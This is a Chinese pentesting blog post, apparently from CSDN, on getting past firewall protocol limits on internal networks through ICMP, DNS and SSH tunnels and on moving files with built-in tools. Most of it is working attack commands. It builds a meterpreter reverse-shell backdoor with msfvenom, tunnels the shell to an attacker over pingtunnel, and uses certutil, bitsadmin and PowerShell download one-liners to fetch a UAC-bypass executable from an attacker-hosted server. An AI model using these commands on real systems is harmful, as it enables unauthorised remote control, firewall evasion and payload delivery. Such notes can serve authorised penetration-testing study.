内网安全-隧道技术-防火墙限制协议绕过-文件传输
隧道技术:
一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、
传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。
封装:
隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。
新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递
传输:
被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。
被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道
解包:
一旦到达网络终点,数据将被解包并转发到最终目的地
解决:
利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络
常见隧道:
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
常见隧道工具:
ICMP隧道工具:icmpsh pingtunnel icmptunnel
DNS隧道工具:dnscat2 iodine
SSH隧道工具:Linux ssh
IPV6隧道工具:socat 6tunnel nt6tunnel
Socks代理工具:Sockscap Proxifier Proxychains
综合穿透平台:Ngrok Frp SPP Nps(麻烦) EW(停更)
端口转发:lcx netsh portfwd
ICMP隧道-防火墙-Pingtunnel&Msf上线
环境:Win主机被防火墙限制出网,只让ICMP协议通讯
解决:实现将Win主机进行CS或MSF控制便于后续安全测试
https://github.com/esrrhs/pingtunnel
判断出网:ping www.baidu.com
Kali生成后门:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe
MSF启动监听:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
Kali开启隧道:
./pingtunnel -type server
Win开启隧道 //将本地3333 icmp数据转发至158的4444 tcp流量上
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 攻击机IP -t 攻击机IP:4444 -tcp 1
运行生成的xd.exe,把本地127.0.0.1的3333端口的icmp数据转发到攻击机的4444端口的TCP流量上。
DNS隧道-防火墙-VPS&iodined&CS上线
环境:内网主机只出网DNS协议数据
解决1:服务器尝试SSH协议连接客户端绕过限制
解决2:上线CS DNS协议
https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com
服务器:iodined -f -c -P xxxx 192.168.0.1 ns1.xxxxx.com -DD
尝试连接:ssh root@192.168.0.2
设置密码xxxx并创建虚拟IP及绑定域名指向
客户端:iodine -f -P xxxx ns1.xxxxx.com
连接密码xxxx并绑定域名指向
SSH隧道-防火墙-本地&远程转发数据通讯
环境:内网Kali2021被防火墙拒绝协议连接
开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
防火墙限制:
iptables -A INPUT -p tcp -s 192.168.46.158 -j DROP
本地转发:
kali2021 //将跳板131访问130流量给本地1122端口
ssh -CfNg -L 1122:192.168.46.130:22 root@192.168.46.131
ssh root@127.0.0.1 -p 1122
远程转发://将本地访问130流量转发给158上1234端口
kali2020
ssh -CfNg -R 1234:192.168.46.130:22 root@192.168.46.158
kali2021
ssh root@127.0.0.1 -p 1234
#文件传输-内网域-Win&Linux自带&上传下载
Linux:nc wget curl
windows:ftp vbs powershell certutil bitsadmin
https://blog.csdn.net/qq_36374896/article/details/84350015
vbs:不推荐
ftp:ftp -s:ftp.txt
bitsadmin:bitsadmin /transfer n http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe
certutil -urlcache -split -f http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe
powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.101:8081/DccwBypassUAC.exe','c:\DccwBypassUAC.exe')
nc:不推荐
wget http://192.168.0.101:8081/DccwBypassUAC.exe
curl http://192.168.0.101:8081/DccwBypassUAC.exe --output myphp.php
思维导图补充:内网-隧道穿透-ICMP-DNS-SSH-文件传输 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。https://www.zhixi.com/view/9a0884f2
内网安全-隧道技术-防火墙限制协议绕过-文件传输相关推荐
- 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议
前言: 介绍: 博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章). 殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edus ...
- 内网***测试定位技术总结
说起内网定位,无论针对内网查找资料还是针对特殊人物都是非常实用的一项技术.这里把目前能够利用的手段&工具都一一进行讲解. 0x02 服务器(机器)定位 收集域以及域内用户信息 收集域内域控制器 ...
- 通过路由器搭建内网穿透隧道
通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 控制面板中选择程序和功能,启用或关闭WINDOWS功能 选择左边启用或关闭 Windows 功能,勾选 Internet Informatio ...
- 【引用】内网安全数据保密技术分析与比较
内网安全数据保密技术分析与比较 邹翔① 王志海②,李志涛② (①公安部第三研究所上海 200031: ②北京明朝万达科技有限公司,北京 100000) [摘要]本文通过对目前主要的内网安全数据保密关键 ...
- 【全过程记录】将windows电脑连接到ipad的rd client远程桌面,通过路由器搭建内网穿透隧道
caiyi 2021/10/03 通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 文章目录 一.找到内网ip 二.找到端口号 三.在ipad上同一局域网下连接 四.在不同局域网下连接 五.突 ...
- 基于FTP协议的文件传输与下载
目录 一.FTP协议: 二.文件上传: 1.连接服务器 2.登录操作 3.上传操作 三.文件下载 1.连接服务器 2.登录操作 3.下载操作 四. 总结: 一.FTP协议: ftp是(File Tra ...
- 【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
目录 一.准备 1.意义: 2.项目: 二.内网穿透 1.简介: 三.Ngrok(入门上线) 1.简述: 2.Ngrok入门上线(国版二开) 3.相关工具: 2.Ngrok入门上线(美版) 一.准备 ...
- 内网渗透攻击技术的利用
DCSync 是什么 在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步.当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 DC 2 发起一个 ...
- 内网穿透的技术解决方案
1.NAT地址转换,解决的是IPV4地址不够用的问题: [硬核]公网访问?内网穿透!零经验上手!_哔哩哔哩_bilibili 2. 公网向内网发送数据的问题如何解决? 设置端口转发 3.多层NAT,解 ...
最新文章
- mysql xid原理_MySQL数据库分布式事务XA实现原理分析
- mysql 导出数据为csv格式
- javascript淘宝主图放大镜功能
- LeetCode 24 Swap Nodes in Pairs (交换相邻节点)
- 12亿行代码,阿里巴巴这一年的技术报告和梦想报告
- 数组转List的3种方法和使用对比!
- linux如何查看磁盘剩余空间
- linux usb不识别,求助:USB无法识别
- 如何使用CSS将文本垂直居中?
- 腾讯实习生招聘笔试题目
- linux服务器连接中文,Linux系统遇到SecureCRT连接到linux服务器之后出现乱码问题
- 计算机网络工程师多久过期,软考网络工程师证书有效期
- SQL Server2016安装教程
- oracle字典在线查字手写,在线字典手写输入
- 计算机桌面底边出现库如何去掉,桌面图标有蓝底怎么去掉? 去掉桌面图标阴影技巧...
- 硬件设计28之RS422、RS485
- ffmpeg解复用FLV文件
- windows命令 format的用法
- mysql安装失败原因和解决方法
- php搜索引擎开源源码,PHP搜索引擎源代码